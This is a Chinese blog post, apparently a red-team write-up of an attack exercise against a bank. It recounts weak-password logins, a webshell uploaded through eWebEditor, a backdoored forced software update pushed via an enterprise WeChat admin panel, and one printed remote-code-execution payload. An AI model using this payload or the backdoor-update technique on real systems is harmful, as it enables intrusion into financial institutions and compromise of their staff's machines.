这篇文章是几年前的一次针对某银行全国的攻防演练~~
微信公众号获取到/newback/ewebeditor/路径。 打开发现为ewebeditor编辑器,弱口令。登陆 太熟悉了(之前遇到过一样,操作行云流水)
不破坏点原则,新建样式,修改上传后追,版本比较高,可能和网上的不太一样。然后预览样式,未发现上传点。奇怪。
那就只能利用已经存在的样式,修改上传后缀,点击预览,发现有上传点,
--没有防护直接上传webshell。返回包存在路径。
内网-->两个网段-->一把锁~~(虽然当时没有fscan~)
利用assert函数调用一句话进行蚁剑链接利用body添加信息 poc: _method=__construct&filter[]=assert&method=get&server[REQUEST_METHOD]=@eval($_POST[cmd]);
找到目标银行的企业微信后台,弱口令登陆。---进行钓鱼 里面有一个软件更新下发--可以强制升级功能。 把之前的正常软件备份,上传自己的后门-->强制用户升级。 主要是钓到一个总部的技术支持的pc。懂的都懂 存在大量敏感信息~~各种服务器,堡垒机啥的都登录在上面。 内网存在多个域,大约几千台机器。
2.小程序的漏洞,也很多。一般都可以任意文件上传。
原文始发于微信公众号(WK安全):针对某银行资产的攻防演练
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论